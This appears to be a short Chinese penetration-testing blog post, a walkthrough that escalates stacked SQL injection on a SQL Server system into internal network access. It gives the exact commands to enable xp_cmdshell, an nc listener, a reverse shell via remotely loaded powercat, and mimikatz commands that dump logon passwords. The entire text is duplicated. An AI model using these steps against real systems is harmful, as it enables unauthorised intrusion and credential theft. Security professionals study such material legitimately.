堆叠注入到内网(日常水文)
前提:POST包存在注入,注入类型:堆叠注入;权限:很高,数据库,sqlserver
遇到堆叠注入,第一想到是否可以执行xp_cmdshell;
发现该系统未开启xp_cmdshell,尝试开启:开启xp_cmdshell
EXEC sp_configure ‘show advanced options’,1;
RECONFIGURE;
EXEC sp_configure ‘xp_cmdshell’,1;
RECONFIGURE;
尝试ping dnslog,成功执行命令:
nc监听:nc -lvnp 4999
利用xp_cmdshell,调用powershell,远程加载powercat并反弹回来到cmd上
mimikatz抓取密码
Mimikatz# privilege::debug
Mimikatz# sekurlsa::logonpasswords
查看进程中存在域控的进程,如果直接进程注入,可以直接拿下域控权限,由于涉及内网渗透,暂不进一步进行渗透。
遇到堆叠注入,第一想到是否可以执行xp_cmdshell;
发现该系统未开启xp_cmdshell,尝试开启:开启xp_cmdshell
EXEC sp_configure ‘show advanced options’,1;
RECONFIGURE;
EXEC sp_configure ‘xp_cmdshell’,1;
RECONFIGURE;
尝试ping dnslog,成功执行命令:
nc监听:nc -lvnp 4999
利用xp_cmdshell,调用powershell,远程加载powercat并反弹回来到cmd上
mimikatz抓取密码
Mimikatz# privilege::debug
Mimikatz# sekurlsa::logonpasswords
查看进程中存在域控的进程,如果直接进程注入,可以直接拿下域控权限,由于涉及内网渗透,暂不进一步进行渗透。
